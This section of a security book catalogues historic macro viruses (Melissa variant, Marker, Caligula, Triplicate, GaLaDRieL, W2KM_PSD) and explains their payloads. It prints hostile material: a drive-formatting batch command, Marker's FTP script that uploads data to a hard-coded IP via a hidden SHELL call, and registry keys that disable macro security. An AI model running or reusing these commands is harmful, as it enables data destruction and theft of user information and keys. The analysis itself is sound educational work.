5.7 Macro Virus Examples
5.7 Macro Virus Examples Here are some representative sample descriptions that demonstrate the versatility of macro viruses. 5.7.1 W97M.Melissa.acThis Melissa variant attempts to format local hard drives and corrupts CMOS memory, along with using email clients to forward itself. It drops off a batch file, called DRIVES.BAT , that contains the following the commands that will format hard drives: echo yformat/q d: /v:Empty>NUL This command is repeated for drives D thru Z. It also edits the AUTOEXEC.BAT file to run a dropped malicious file, Y2K.COM . This executable file will attempt to corrupt your CMOS settings (disabling the hard drive, etc.), but usually does not result in permanent damage to your CMOS. 5.7.2 W97M.MarkerMarker is a Word macro virus that keeps track of who it infects and transmits this information to a well-known hacker site (now closed). It creates two temporary ASCII text files on the local hard drive with names like NETLDX.VXD and HSFEDRT.SYS . The .SYS file contains the virus code and the .VXD file is a script file that is used with FTP.EXE to send information back to the hackers. The .VXD file contains the commands in Example 5-4 to which I have added comments: Example 5-4. Marker virus FTP script fileo 209.201.88.110 ;opens an ftp connection to hacker's ftp site user anonymous ;logs user in as anonymous pass itsme@ ;puts in password cd incoming ;changes to subdirectory called incoming on hacker's site ascii ;puts file transfer in ascii text transmission mode put hsfedrt.sys ;uploads tracking information to ftp site, where hsfedrt.sys can be any ;randomly generated name. quit ;ends ftp session The macro code contains the following SHELL command, which allows it to do its work secretly : SHELL "COMMAND.COM /C FTP.EXE -n -s:c:\netldx.vxd", vbHide It also disables Word's macro warning prompt. It keeps track of the user information found in Word's User Name and User Address information fields. Thus, anyone infected can usually find out who infected them and trace the origin of the virus back several generations. The virus maintains a setting in the registry (HKCU\Software\Microsoft\MS Setup (ACME)\User Info \LogFile) to keep track of whether it has sent information from this particular user before. If so, it doesn't do it again.
Example 5-5 shows a log file provided in an example I received (names and addresses have been changed to protect the innocent): Example 5-5. Marker virus log file'Logfile '09:08:36 - Saturday, 28, Nov 1998 'Richard D. Collier, III 'RichDesigns.net ' '02:50:31 PM - Saturday, 28 Nov 1998 'Elizabeth Rose' 'Straight-A Students, Inc. ' '12:49:03 PM - Saturday, 9 Jan 1999 'Lillian Hanson 'Genius Tutoring 'Two Embargo, Suite 3800 'Richmond, CA 94111 ' 5.7.3 Caligula Word VirusThe Codebreaker group released another intriguing macro virus. This one attempts to steal users' PGP private keys. PGP , or Pretty Good Privacy , is one of the world's most popular data and email encryption programs. PGP users have a private encryption key that is used to do the encrypting. It is encrypted itself, but usually protected by a weak password. The Caligula virus is a stealth Word infector written in VBA5. When loaded, it checks to see if the current Word document or global template contains a class module called Caligula. If not, it exports its source code to a file called IO.VXD , and imports it to the global template. On the 31 st of any month, it will display a message saying "No cia, No nsa, No satellite, Could map our veins. WM97/Caligula Opic [Codebreakers 1998]." Each time the virus is run it looks to see if it has already tried to steal the user's PGP private key (if one exists) by looking in registry entry HKCU\Software\Microsoft\MS Setup (ACME)\User Info. It looks for the value, Caligula. If present, it means it has already tried, or PGP isn't loaded on the user's PC. If not, it looks for PGP's install path from the registry and searches for the private key, which by default is named SECRING.SKR . Next, a new text file, CDBRK.VXD , is created as an FTP scripting file to upload the user's private key to the Codebreakers' FTP site. Even on users' systems without PGP, the virus will keep on replicating like any normal macro virus. I'm not sure of the legal reasons, but many computer security experts said this macro virus action (the stealing of a user's private encryption key) did not violate U.S. law. Luckily, the Codebreakers web site was shutdown in an unrelated hunt for the Melissa virus writer. 5.7.4 Triplicate VirusTriplicate is a common macro virus and the first cross-platform virus to infect three applications: Word, Excel, and PowerPoint. It infects the global template in Word, places an infected workbook called BOOK1 in Excel's Startup directory, and creates a new macro module called Triplicate in Powerpoint. Triplicate was initially placed on a virus writer's web site, hidden in a web link. If a user clicked on the web link, it would load an infected document. In many cases, it would load in Word from within the browser without setting off any macro virus warnings. 5.7.5 GaLaDRieLGaLaDRieL is the first virus based on Corel Script , the macro language for Corel Draw. It does a simple file search for new victim files (files with .CSC extension and the appropriate attributes). When a suitable file is found, it looks for the following text, "REM ViRUS," which identifies previously infected files. Its nonmalicious payload goes off on June 6 and displays an excerpt from The Lord of The Rings . 5.7.6 W2KM_PSDLong before Office 2000 was officially released, it had its first macro virus. This polymorphic class virus waits until the day of the month is the same as the current minute, and then fills the current document with between 1 and 70 random shapes . It disables Word 2000's macro security by modifying the following registry key: HKCU\Software\Microsoft\Office\9.0\Word\Security.  |
| | |
Team-Fly  |
| Top |
EAN: 2147483647
Pages: 176